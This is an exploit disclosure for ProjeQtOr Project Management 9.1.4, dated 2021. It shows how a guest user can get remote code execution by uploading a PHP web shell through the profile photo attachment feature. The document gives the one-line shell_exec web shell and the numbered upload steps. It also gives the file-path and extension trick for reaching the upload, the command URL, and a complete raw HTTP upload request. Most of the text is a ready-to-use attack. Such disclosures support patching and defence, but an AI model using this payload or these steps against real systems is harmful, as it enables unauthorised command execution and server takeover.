# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution# Date: 29.05.2021# Exploit Author: Temel Demir# Vendor Homepage: https://www.projeqtor.org# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip# Version: v9.1.4# Tested on: Laragon @WIN10# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section.
PoC Process Step_by_Step:# 1) Create a file with the below php code and save it as demir.pHp<?php echo shell_exec($_GET['key'].' 2>&1'); ?># 2) Login to ProjeQtOr portal as guest user# 3) Click -profile- button on header panel.# 4) Click -add photo- button and chose upload section and browse your demir.pHp file.# 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )# 6) As a last step you have to add the ".projeqtor" statement to the file extension.
You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor
# 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]
Example Request:
POST /project/tool/saveAttachment.php HTTP/1.1
Host: ip:port
Content-Length:1196
Accept: application/json
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Origin: http://ip:port/website_location/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://ip:port/website_location/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)
Connection: close
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp"
Content-Type: application/octet-stream
<?php echo shell_exec($_GET['key'].' 2>&1'); ?>------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentId"------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentRefType"
User
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentRefId"($your_profile_id //edit)------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentType"file------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="MAX_FILE_SIZE"10485760------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentLink"------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentDescription"------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="attachmentPrivacy"1------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
Content-Disposition: form-data; name="uploadType"
html5
------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--
